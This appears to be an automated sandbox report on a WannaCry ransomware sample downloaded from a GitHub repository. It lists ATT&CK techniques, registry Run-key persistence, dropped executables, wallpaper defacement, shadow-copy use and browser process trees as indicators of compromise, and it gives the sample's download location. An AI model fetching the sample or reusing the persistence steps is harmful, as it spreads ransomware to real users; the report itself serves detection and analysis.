wannacry | hxxps://github[.]com/chronosmiki/RANSOMWARE-WANNACRY-2[.]0/blob/master/Ransomware[.]WannaCry[.]zip

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD8371.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD8388.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 64 IoCs

pid	Process
2816	taskdl.exe
4856	@[email protected]
4604	@[email protected]
5460	taskhsvc.exe
4080	taskdl.exe
3344	taskse.exe
4528	@[email protected]
556	taskdl.exe
4420	taskse.exe
2220	@[email protected]
4936	taskse.exe
5480	@[email protected]
5812	taskdl.exe
5180	taskse.exe
2700	@[email protected]
5240	taskdl.exe
2876	taskse.exe
4976	@[email protected]
5892	taskdl.exe
912	taskse.exe
4332	@[email protected]
4556	taskdl.exe
1856	@[email protected]
2392	taskse.exe
5176	taskdl.exe
1036	taskse.exe
5444	@[email protected]
1756	taskdl.exe
4652	taskse.exe
2704	@[email protected]
2396	taskdl.exe
1720	robux.exe
2156	taskse.exe
5820	@[email protected]
3948	taskdl.exe
5812	taskse.exe
5464	@[email protected]
5508	taskdl.exe
1768	taskse.exe
704	@[email protected]
392	taskdl.exe
2300	taskse.exe
5708	@[email protected]
1756	taskdl.exe
5672	taskse.exe
6128	@[email protected]
3336	taskdl.exe
5216	taskse.exe
2136	@[email protected]
4412	taskdl.exe
2044	taskse.exe
516	@[email protected]
5840	taskdl.exe
3460	taskse.exe
2376	@[email protected]
5808	taskdl.exe
5328	taskse.exe
5592	@[email protected]
5508	taskdl.exe
1512	taskse.exe
2968	@[email protected]
4280	taskdl.exe
4552	taskse.exe
4740	@[email protected]

Loads dropped DLL 9 IoCs

pid	Process
5460	taskhsvc.exe
5460	taskhsvc.exe
5460	taskhsvc.exe
5460	taskhsvc.exe
5460	taskhsvc.exe
5460	taskhsvc.exe
5460	taskhsvc.exe
5460	taskhsvc.exe
5460	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4368	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kcuvipyafvelmp658 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
48	raw.githubusercontent.com
51	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
9108	timeout.exe
9440	timeout.exe
3820	timeout.exe
2164	timeout.exe
5740	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "155"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133657784757072016"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-47134698-4092160662-1261813102-1000\{AC36E1B1-E990-48EC-AA5A-5007B7F89473}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-47134698-4092160662-1261813102-1000\{F105CE29-1165-4A94-89A1-1C6467B4786A}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
4396	reg.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 872239.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 227929.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 56 IoCs

pid	Process
4768	msedge.exe
4768	msedge.exe
4596	msedge.exe
4596	msedge.exe
2284	identity_helper.exe
2284	identity_helper.exe
3580	msedge.exe
3580	msedge.exe
5460	taskhsvc.exe
5460	taskhsvc.exe
5460	taskhsvc.exe
5460	taskhsvc.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
5460	taskhsvc.exe
5460	taskhsvc.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
5848	msedge.exe
5848	msedge.exe
5848	msedge.exe
5848	msedge.exe
3840	msedge.exe
3840	msedge.exe
644	msedge.exe
644	msedge.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
2940	msedge.exe
2940	msedge.exe
364	powershell.exe
364	powershell.exe
364	powershell.exe
3596	powershell.exe
3596	powershell.exe
3596	powershell.exe
1852	powershell.exe
1852	powershell.exe
1852	powershell.exe
8584	powershell.exe
8584	powershell.exe
8584	powershell.exe
6940	chrome.exe
6940	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
4528	@[email protected]
4264	cmd.exe
4204	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 34 IoCs

pid	Process
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
6940	chrome.exe
6940	chrome.exe
6940	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2220	taskmgr.exe
Token: SeSystemProfilePrivilege	2220	taskmgr.exe
Token: SeCreateGlobalPrivilege	2220	taskmgr.exe
Token: SeIncreaseQuotaPrivilege	5564	WMIC.exe
Token: SeSecurityPrivilege	5564	WMIC.exe
Token: SeTakeOwnershipPrivilege	5564	WMIC.exe
Token: SeLoadDriverPrivilege	5564	WMIC.exe
Token: SeSystemProfilePrivilege	5564	WMIC.exe
Token: SeSystemtimePrivilege	5564	WMIC.exe
Token: SeProfSingleProcessPrivilege	5564	WMIC.exe
Token: SeIncBasePriorityPrivilege	5564	WMIC.exe
Token: SeCreatePagefilePrivilege	5564	WMIC.exe
Token: SeBackupPrivilege	5564	WMIC.exe
Token: SeRestorePrivilege	5564	WMIC.exe
Token: SeShutdownPrivilege	5564	WMIC.exe
Token: SeDebugPrivilege	5564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5564	WMIC.exe
Token: SeRemoteShutdownPrivilege	5564	WMIC.exe
Token: SeUndockPrivilege	5564	WMIC.exe
Token: SeManageVolumePrivilege	5564	WMIC.exe
Token: 33	5564	WMIC.exe
Token: 34	5564	WMIC.exe
Token: 35	5564	WMIC.exe
Token: 36	5564	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5564	WMIC.exe
Token: SeSecurityPrivilege	5564	WMIC.exe
Token: SeTakeOwnershipPrivilege	5564	WMIC.exe
Token: SeLoadDriverPrivilege	5564	WMIC.exe
Token: SeSystemProfilePrivilege	5564	WMIC.exe
Token: SeSystemtimePrivilege	5564	WMIC.exe
Token: SeProfSingleProcessPrivilege	5564	WMIC.exe
Token: SeIncBasePriorityPrivilege	5564	WMIC.exe
Token: SeCreatePagefilePrivilege	5564	WMIC.exe
Token: SeBackupPrivilege	5564	WMIC.exe
Token: SeRestorePrivilege	5564	WMIC.exe
Token: SeShutdownPrivilege	5564	WMIC.exe
Token: SeDebugPrivilege	5564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5564	WMIC.exe
Token: SeRemoteShutdownPrivilege	5564	WMIC.exe
Token: SeUndockPrivilege	5564	WMIC.exe
Token: SeManageVolumePrivilege	5564	WMIC.exe
Token: 33	5564	WMIC.exe
Token: 34	5564	WMIC.exe
Token: 35	5564	WMIC.exe
Token: 36	5564	WMIC.exe
Token: SeBackupPrivilege	1616	vssvc.exe
Token: SeRestorePrivilege	1616	vssvc.exe
Token: SeAuditPrivilege	1616	vssvc.exe
Token: 33	2220	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2220	taskmgr.exe
Token: SeTcbPrivilege	3344	taskse.exe
Token: SeTcbPrivilege	3344	taskse.exe
Token: SeTcbPrivilege	4420	taskse.exe
Token: SeTcbPrivilege	4420	taskse.exe
Token: SeTcbPrivilege	4936	taskse.exe
Token: SeTcbPrivilege	4936	taskse.exe
Token: SeTcbPrivilege	5180	taskse.exe
Token: SeTcbPrivilege	5180	taskse.exe
Token: SeTcbPrivilege	2876	taskse.exe
Token: SeTcbPrivilege	2876	taskse.exe
Token: SeTcbPrivilege	912	taskse.exe
Token: SeTcbPrivilege	912	taskse.exe
Token: SeTcbPrivilege	2392	taskse.exe
Token: SeTcbPrivilege	2392	taskse.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe

Suspicious use of SetWindowsHookEx 30 IoCs

pid	Process
4856	@[email protected]
4856	@[email protected]
4604	@[email protected]
4604	@[email protected]
4528	@[email protected]
4528	@[email protected]
2220	@[email protected]
5480	@[email protected]
2700	@[email protected]
4976	@[email protected]
4332	@[email protected]
1856	@[email protected]
5444	@[email protected]
2704	@[email protected]
5820	@[email protected]
5464	@[email protected]
704	@[email protected]
5708	@[email protected]
6128	@[email protected]
2136	@[email protected]
516	@[email protected]
2376	@[email protected]
5592	@[email protected]
2968	@[email protected]
4740	@[email protected]
7728	@[email protected]
9244	@[email protected]
13212	@[email protected]
9580	@[email protected]
11240	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4596 wrote to memory of 3600	4596	msedge.exe	83
PID 4596 wrote to memory of 3600	4596	msedge.exe	83
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 3392	4596	msedge.exe	84
PID 4596 wrote to memory of 4768	4596	msedge.exe	85
PID 4596 wrote to memory of 4768	4596	msedge.exe	85
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86
PID 4596 wrote to memory of 620	4596	msedge.exe	86

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2728	attrib.exe
3268	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffb99446f8,0x7fffb9944708,0x7fffb9944718
  2⤵
  PID:3600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2272 /prefetch:2
  2⤵
  PID:3392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  2⤵
  PID:620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:1256
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
  2⤵
  PID:1604
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5652 /prefetch:8
  2⤵
  PID:4240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
  2⤵
  PID:3716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6016 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
  2⤵
  PID:5428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
  2⤵
  PID:5436
